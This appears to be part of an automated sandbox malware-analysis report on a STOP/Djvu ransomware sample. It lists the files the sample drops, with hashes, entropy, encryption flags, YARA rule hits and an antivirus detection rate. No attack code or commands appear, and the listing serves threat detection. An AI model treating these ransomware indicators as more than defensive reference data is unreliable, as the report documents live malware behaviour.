                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997008322080646
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:W9PPDVhPFyxCRq42/ANVpHCdMowiO4KQ1ozfVkXR2g4x:WpPRNFygRMAXpiGowiu4WVA8
                                                                                                                                                                      MD5:353E6C2D5A794933FD8D11C0EC928C3B
                                                                                                                                                                      SHA1:7B92D4E05C7057B68AAEC5651A38F48A417A502B
                                                                                                                                                                      SHA-256:41847B2BE27CADA70044A673EE97AA32BC3FCFA5F698956080AFB5E3E52B2EEB
                                                                                                                                                                      SHA-512:D645AE741784F28E0716305E918481DEC0ED9752C4CB068B736D10B253C67CCB47044402259AE00110909675A2B4981E45B8B41BD046B1002F4321F06BD0DD68
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997145089990632
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:yuu3KIt08khtn03FoY8490zxPmMyu8yJotU/5Eh5Tz3mOJsuXdPovYa:yuJKkhBOFCFPmnUOhLDDFoga
                                                                                                                                                                      MD5:B0195F01DFA88DCD06D18494E3006596
                                                                                                                                                                      SHA1:31FC930A940CFE6ADC59818831ABA78233658CB2
                                                                                                                                                                      SHA-256:3AF53E17A309941CBF2A71D9ECEB791414714B1D6D1A055EE8B1910EB9BA2B8E
                                                                                                                                                                      SHA-512:89DDF74985CFB8CC14C848943FC1B090B350B740EF6C0939D60934AC5B7021CEB5D88FC8B44000CCB70DAC9646F7E57358DF370A9484A1E2A0253CABCFAAE2EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1601198
                                                                                                                                                                      Entropy (8bit):7.987451630407055
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:SDK0o270SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUg:S20L24gQu3TPZ2psFkiSqwozt
                                                                                                                                                                      MD5:7C75E2492E46302276B04D541D5797F4
                                                                                                                                                                      SHA1:88696AB0356824BA6A68ECD1A852E20257F24D0D
                                                                                                                                                                      SHA-256:D5C1EABDA90071846750011C06E82089C066D8B943367B263CCDAD5278D6F320
                                                                                                                                                                      SHA-512:03E2603F5DF1EB88F7BC6108BAB16197AC854313258B384B1F87A72645B58B363F00D9D702FFD83C4130AC8FA0DAD96EC908969CA24821D593E07357271B0EE2
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.9973360230375885
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:Irm+kbCdaJ07MpZ3txMfrSEnpbQboZZ54T7muF/3/Ae:Ia+rdai7oZ3zMLp8O+L3/x
                                                                                                                                                                      MD5:833F127D60D70FA87D8C25106C33B238
                                                                                                                                                                      SHA1:829BC64EC4B43311BFF1491F099BA1F6585888BD
                                                                                                                                                                      SHA-256:8B55287CCB43AB284610F070B8813C8DC0861E9C0F1114CCB6932EE262FE4710
                                                                                                                                                                      SHA-512:856F651585DA0EB2A149AAEE675D20569157F5F4EE1AF992AAC865A78C6E2FE2568D58B3E0E555C865070B5C3F432C10E7562C535B8CDEA552EF09CBBD564D83
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997269298719015
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:1qoQ1g/PUZVijg/q6GhyFiXWHkyBYh4peoD3CV:aZVijzhDwCmM
                                                                                                                                                                      MD5:23AFA38672E5306295BCEC4CFF8F2FB7
                                                                                                                                                                      SHA1:5F60D42ADF89E69D0A2161686265EE6D508C596C
                                                                                                                                                                      SHA-256:D571222A65C88CF195C3F1BD2BE6F3B96E1F9098129A6D21F3A94294F25960EA
                                                                                                                                                                      SHA-512:92882014E5671634BBAF08F0DA7514B99D0A0102E1284E52289046E5C2A88AE970A1C74B27D8F9EB1994EAA4E7686E0019DD99CA3E65AADBE78F1A8C824637C1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997262806942996
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:R69DpP6GJBaAqZRKQ4sIs1GuzbZrd1XYZr6aFwMKM16ZxvS4C6wB4/C:Gi8BaZZRKfsp1GuzbNd1XIkM16bvbcoC
                                                                                                                                                                      MD5:A657D9DB1213C7FFB33358E0ABF32E43
                                                                                                                                                                      SHA1:EB88D4D73B258EFD38CBFD92C4C797A0E7776707
                                                                                                                                                                      SHA-256:7D988E7DFC771DDA2481502AA102BCD7EEF11534D38B9405D50A872FC907681B
                                                                                                                                                                      SHA-512:5CC6DEA85B26C6ED599232337FC5386B1496495B9CBB5D01CA9F9B26235C6CA2A27A3871FE988DD319F0B4647AA933DBA79F69ACAEFA73F8B3C0FA95515088D9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997096675159365
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:kUoQic0SAV/2T50IV4QbwHqkXpbrj8yCQjzuRhvOO:Wc0SAcWIV4prj8w8l
                                                                                                                                                                      MD5:B473D3EF1AA4AB1EACC6D64885F53020
                                                                                                                                                                      SHA1:76A96E04E7E384AFFF919F470C5A417E709704C0
                                                                                                                                                                      SHA-256:6FCF3B6200C166CB830DBD2C74F2E202E48C20D9F02ECA2CF399F17297B980AF
                                                                                                                                                                      SHA-512:FC80BEFF467A376107C9D7FF8804F84F628ACBAE2DC38B3AABD03BEBEFBA561A8F94474DC3F8FA97BF4E00079C1EE62199F62C85149EA19FB8A2203F5252DA26
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997584614740485
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:9l45XdGE9ETBDUfx/D9BJFzCxUUZi4KT3mjOTnxZKvHS9oGVJa:9lwXrEyfV95CLKT3mjKxYaoCM
                                                                                                                                                                      MD5:89E271A948FAA15DB9E98B18625D202C
                                                                                                                                                                      SHA1:FE79D1C277507BF71D2B56D4D6CBA319BBE8AA24
                                                                                                                                                                      SHA-256:FF96A9E9DC3781F70C35F9BA378B7D3A7119D837001142F4D4BB5D77D1859275
                                                                                                                                                                      SHA-512:822C8605C85D717306DF796F821EAE8417CD76BE3D77B4C60F9B526D484C12E23075F8622A69377A28BF07F083FD8B482A8121BD09A6DB7A754B8881FF00874A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997211347285652
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:NeutngY44Ex562cIs7KbZ16KTGChrTXH/yNVnKbyP7CAe:NeCgY4XSI1EiXH/yNqg7Ct
                                                                                                                                                                      MD5:DC4604A65C5867D089BFC4C9848E9B53
                                                                                                                                                                      SHA1:4A4D1352F24CE3F9D1A76E47A814C0F42E494CF0
                                                                                                                                                                      SHA-256:9A5922697B5EDFC4E3A1A2D0FDBB1539ABF346CDD6DC56FA63E791D882BC6701
                                                                                                                                                                      SHA-512:EF7F6C1314BDBABE765F72B6D96C2C6AF9B5F06DA7A8CB55514AF1B04399829A6DD3F95929FA12513AB575F3C1998ABCE4BC8431FC05724AB8C235939E54BFE6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997810212418462
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:dQVdBjEXV27bw36SEYandD5SzLLHFzh6Cl83TO9BE/0Zb8hhSv:mV7El2703XGeLHLH2KvE/0Z4Mv
                                                                                                                                                                      MD5:ADA388B8B0776F416D3F21C1F5569491
                                                                                                                                                                      SHA1:545F0BBF095646D5BE9B81546DB602CC2E6342B0
                                                                                                                                                                      SHA-256:B9BE681CD4E39976AB3D37FD078E8CF624794DE44AFFB8ECE343614FF51B72C0
                                                                                                                                                                      SHA-512:5DD9DE45C3828949BB1A522FE8E1A9CB559677121B01120A42C0240A71BEB8672773AB7AC9EA0FDA57D1091AD21255E7D32BBAA64977798C43CF2E2F602708FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):42164934
                                                                                                                                                                      Entropy (8bit):7.947669527692684
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:786432:HwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59N:QQcWxDMPnN+dk65gGUjku4vNjLjN
                                                                                                                                                                      MD5:A63E92C370B5B7528B392E48BF4AFF8B
                                                                                                                                                                      SHA1:84015AD81D6FBFB6157B57224A53EF5701292189
                                                                                                                                                                      SHA-256:2AE4E9F6E540AD0A1E58F09E54C6E5687EBCFA28C3CE7C80D10E673C96E7C8CA
                                                                                                                                                                      SHA-512:F8B45EDBDA434BA8059FE808A1A82BFFF1A4B078ED3E37AB4A6BD6D7862D6D58A29B5856019B09A19A2AEDF7B7BF9FC28499C4508131D51CCD12EF3DFE09CD75
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                      Entropy (8bit):7.7700730740248884
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:twOexkBe2Pcal3WJEF8m33V+KvKFMLe42bD:qufPcgGU8m38prD
                                                                                                                                                                      MD5:AF4C389B634FECB5BFC56BBACA41F0DA
                                                                                                                                                                      SHA1:02462F8123CF7AA9371772CC631A18C4D5DCCA24
                                                                                                                                                                      SHA-256:E6CC9249F58EBA2D790EE3DEC96D1256C7F9ECE83CC71FDB11C95EB7FBE7E6B8
                                                                                                                                                                      SHA-512:424D6EA0033A7F281B96E6E8697ED6F45001E534E216BE9092B6954D0FB5A0B43EF813661FB1525C211BEAFA33349FBAC248C58D7BF552D85D5B1B6DE9760F00
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.963935881177714
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:g8RFI7egUGgfsf8AWrCFBzu4AJlPbD1Q+rIW7jw6+uqJPHolZgyf8v6OJTzMJKGq:gEFI63fsf8AWrCFByvPzDvIec6hiPHoc
                                                                                                                                                                      MD5:7C4DD34C54710A9B3CBDBF1A8628AC5D
                                                                                                                                                                      SHA1:017E2A18B71F3128F6E4BC35BFE768C43801015C
                                                                                                                                                                      SHA-256:5C6C369DB0BD843F51CC92CA7BDCDB09CDBC01667AB0C5CB127E4ACF50695BDC
                                                                                                                                                                      SHA-512:74DB20C3F0BD778E56752DB0D45C5C2368CBC0955ED2DAE1103A329A0001BB7903DF180A12E725CFC523BA13EBFC996EBE4B809F974F6EC9CC900A6BE6046C90
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.968940637033909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:PD1Yb/eyYeloW76IeAbUNHTAb4Gqvz+AY34m0RvSNhxH1T4x5f+c:P6b/eIUFHz+p0VG1T43Z
                                                                                                                                                                      MD5:9476D6CEBFD82873862A7ACBC0F466D3
                                                                                                                                                                      SHA1:90E9B443D5C9B749BDDCD7E609EACDDF9512D385
                                                                                                                                                                      SHA-256:F92CCFB332EBC70BE561D63E0D171F8539E49C483B15EB89A71CCB53CDAECA82
                                                                                                                                                                      SHA-512:378009B6C09993E4833E85025B3A181818C45E0CF50736A4138E25885ED1D079D2427AEE6CD0189996D81589B6E065F42C144ABC029BB6BAAF5CA6C0FE4B1035
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.971488518202093
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:n66e0qcdt/Uf7vywt7LHr3up7Vv0SUUZHT92mHiKrodV:Mcdhuvyk7rrIsSUUZHT92mCaSV
                                                                                                                                                                      MD5:C473DC53B0D72DE51F6F81CC50C9A1A1
                                                                                                                                                                      SHA1:1B385EE28B11D4DE14851414BC27E075D96D8B05
                                                                                                                                                                      SHA-256:A194AED24CC086A5001D29BC2ED51F8F8EE285C2005C57121C7A61AAAE523E61
                                                                                                                                                                      SHA-512:3550B53B519411DEA7376C6EBAF54A5E74587FD952F8743BAC2027FBED87A91A319443D6B7F330044E94D57DB109EC6F2DE25C9E1E773C68FAB3725B0B92D61F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.969863558268538
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:dPQr04Lwxvg6A/Mx0hfoBk4jyS/fPg907RnGUB/gOReSLKACOwtzV4Tz128BYmSj:5QrL56A/C/jFXDxjLKesZQ28BYmSj
                                                                                                                                                                      MD5:698C2CB4A3CEFBAD88760EE524A44DA6
                                                                                                                                                                      SHA1:3F76BDEA44DC4C8DF0ACDB5FE8CC0584EC69BCBA
                                                                                                                                                                      SHA-256:1C81AD0998A791F5F21B93D609BE161469488A40FE91C9E79473210826E798F5
                                                                                                                                                                      SHA-512:ED03CE30939D07790E532FA549B78035840D1ABE3D27158AF17126C0CABB84B56F47B315E88B58EDDD3852BF67906FB01DE8E0724EBB51B3968E7D4CBDACE7EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1150976
                                                                                                                                                                      Entropy (8bit):6.657605522788283
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8dWQHUq7:F0dwAYZt6C31WeTVRPOhd7Uq7
                                                                                                                                                                      MD5:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      SHA1:C4C3A4650D278F2F8B9BF871C2AE91508FFAE165
                                                                                                                                                                      SHA-256:4AD7B8D228FE32D82B0373CE886F224F47C2E06A59D394C634160C70083B5F32
                                                                                                                                                                      SHA-512:EAEA7FA64C8BEDF0698A12F16871C5A4CAF19F4CE5576765D2D803568C8FE95AE4BEF456C2C72F1591BDA16FCE412850889770A58A5E239E60A31633BFB7D110
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: unknown
                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: ditekSHen
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):67138
                                                                                                                                                                      Entropy (8bit):7.997378869456333
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:j7H+nYD14uMJhdmphmh6fokuk9jEEc/w28FQ4D1svHmUj0E:j7H+YDUzmp8QAZNEcMdD1MHfj0E
                                                                                                                                                                      MD5:4F598216E6BD9811C62A121781763518
                                                                                                                                                                      SHA1:22D3E864B795231E9CA206EA2529FAC37679200C
                                                                                                                                                                      SHA-256:7A2C190CBE9AFCC51C651AF21244864A81362D34ECE80649889AEE8E94BCA032
                                                                                                                                                                      SHA-512:5794DE62600A36CC27168FFCF21E5E6981AFB35C04434C72F126576E238D8CF16D43564ADFB12561FC731BD5D24B7F04E67769B32ECC110935AB12C1069BE6A0
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1071
                                                                                                                                                                      Entropy (8bit):7.800297610523546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yHNyt29UXbiZE0kF8DSBqKKJFv+Eyn8py/NIo/mEiHqC2bD:yHNyQCXWZEFFwUCR+Eyn8py/LeECsD
                                                                                                                                                                      MD5:21526B47A4F0CAE6560198826D63B8DA
                                                                                                                                                                      SHA1:BF31E76630D2D61DAF3AA1B7934D16FDCE4DB804
                                                                                                                                                                      SHA-256:73409AC982DE7AF5750EEECA032AE5AB5D20C0D6A494E94D13A246BE40DD384A
                                                                                                                                                                      SHA-512:7DA4F490AA529959E15C43682C25C8A517CE7C6D8F52FB251DD02CCA9E1C5AEAB0EC387A845013CA6FAA57D76170CC89241E52B5B57B9F9F20A0187FC4CE2DEB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):370
                                                                                                                                                                      Entropy (8bit):7.261718912141876
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:Bk+Zixtrq0jUO6gy/yVS48ZQTi9yFNrHxis5D0Y3zP501qLljDI3r0wknIS1WdNX:e+Z+PSKw4EORx01qlI3r9SUdNcii9a
                                                                                                                                                                      MD5:57BF998DA9CDDE5D16E1522BE80098E2
                                                                                                                                                                      SHA1:C645AE3DEEBD033356CAA7EB75B76098FCC6837C
                                                                                                                                                                      SHA-256:552566AA8C248443AAD09933523B37014D6FDEF2B3843D3A3D753124580D24A1
                                                                                                                                                                      SHA-512:89CAE7A352D8008BFB3A65F70CD4C68FC8B049C7E95671A36A4FC0AF18BEC5ECD5C998CF7B0A3633D495C23B8204900BF032B592FCDE796F42D8EC9AABB20BDA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):388
                                                                                                                                                                      Entropy (8bit):7.304914270460438
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DYKzesR+mpao2agV7ZPcR7Wm3kF3PRNSUdNcii9a:DYKzeq52x1cR7W5hPu2bD
                                                                                                                                                                      MD5:555152DB69B4FD793DD3FB8D3F359C01
                                                                                                                                                                      SHA1:A4E425BDF5AE5F89C07A30D8A1888AAA7E2B3AC0
                                                                                                                                                                      SHA-256:95AE1C7DA1E5797EDAAE46ECB34B4C3DCD35F6992979D982B0C10E038566A169
                                                                                                                                                                      SHA-512:D5C1A02B5F6A19568F92341C07F72C2B2369DA8F598A6941514DCBF9A5A5672760C92BB3E2FB013D8F11201E3ABAD5394CA6F597556A52236812AD339BF3DDC9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):350
                                                                                                                                                                      Entropy (8bit):7.2173365778442795
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:QIaJKXUWvYE+BoeO+6/yxocLxyDLX21aRrsmq7Se7IZWJylKm/TlnIS1WdNcii9a:QTJyvvl3+UpcLxyDLXRPenqomrWSUdNX
                                                                                                                                                                      MD5:B377459698EDA080069B667A768171C9
                                                                                                                                                                      SHA1:29F35D4488B145BA6E889472E0C3F029D347F13A
                                                                                                                                                                      SHA-256:A05B95841F5450340C78D949411CB652B563E3152AAA8B5CA8C368BD01D4A224
                                                                                                                                                                      SHA-512:B9AF19E99121591D510EB167065CCFFEA7891A54EEE835AE3E9F7BE01AA0E68D3C90B976035E6DFAC4E7E954A65621801422CEC8CCA9FD86D56344C7CB945A6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1352
                                                                                                                                                                      Entropy (8bit):7.839620154083292
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Nw6hpmXNjp6cIOakmqOtKfZz+HhJPSEUZqq8nTE8ocYz9kmXNB/1O5EAtRXMYIL4:Nw6hpkzOIf1+HhJPSEUZsTR7w18lXMHU
                                                                                                                                                                      MD5:7D70FFAE284652BB55C33F8B8A234421
                                                                                                                                                                      SHA1:AFF43C11587EBB1E7F17B4A47E417378D09984F6
                                                                                                                                                                      SHA-256:7BDB207C7391F335A3B00D344A7B4EA1B259AF0BB12DF1094D308B8912631789
                                                                                                                                                                      SHA-512:4FAC25E68C6FF2A482E6BD2A74659A03C6EC3187737178519FF81080001B943D536B503970DEC6E3F114669887EBAC43A2A98A9A085B4B56A38112B09026A603
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2424
                                                                                                                                                                      Entropy (8bit):7.9196043738215485
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:3xN7X9He2IHmk5VBlBnZyACSUDc3+ZeTJEkLMFiwhM1Nj01v0DbfbD:BNBHe2635TgfSUTMaFiwhOjnfX
                                                                                                                                                                      MD5:58FD3A011C2139349B638948365F64DD
                                                                                                                                                                      SHA1:3401E8EA347E4B62BB3124526347CC58F0D2685A
                                                                                                                                                                      SHA-256:79311A18A19589F1BAC61408E595136F3BF341084D01986C6B903A8DD44D8D50
                                                                                                                                                                      SHA-512:16C987595BD990EB1FADE5B8C57AFD22DCC6BA6026ECB5DAE3E9A8074A99F6DF1EF69E8BF41CA30085C10918D7EC08730DA16AB5C0476B8FDD2A4DB3CB4A4A6F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2381
                                                                                                                                                                      Entropy (8bit):7.9254174691554
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:M4oO/KUmCuiETk//L0skAbiI26nuTb9kAaIHna6aXSTLL3a8vGwsWmVoBD:oOhmCuHTk//PkAp69kAaIHnaNiTzGzWt
                                                                                                                                                                      MD5:ACFA99D1477C3D2AFE327E88B7E611A8
                                                                                                                                                                      SHA1:23FCCC1B5EAD7D281C870417F8EBE6B130DD7F51
                                                                                                                                                                      SHA-256:FCE42D3A6C658B5B28F8709C33BB31A40E6D4DE91147AA71FD99CC9930652AE0
                                                                                                                                                                      SHA-512:6491702A7D9AC5E42FB68597A6787C04B885FBB179ACF5069C45734B2A832B3EB7281C6F4A9E0C4F2BFF2C036319DBFF5C5BDAC1941E29D4CB37DDD33F39C059
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2398
                                                                                                                                                                      Entropy (8bit):7.931587966854671
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:PdokLp/O/2+EHPpbkF9ExrvNm6kH87/cwV68iIcf+QgSG23416gD:nV62+EHPpbkF9EJV8H87Yhf+Q1G234d
                                                                                                                                                                      MD5:BE03FC87B7C0FAC3653D9B318B75661D
                                                                                                                                                                      SHA1:2124E053CA9E4C4D4CE93706AC72111BD2A1300F
                                                                                                                                                                      SHA-256:35B56979CEE810848DE125F0488B728C36AF774143005D2AD76F0CFFA49AE043
                                                                                                                                                                      SHA-512:57D20B11640827985DAC58CE67871D7DECE91A5EDDB33353187A681E518A62DEC71FE312BBD1CF45E72B50303E096900E19D96E4DCD7444DE638B49BC8D9762D
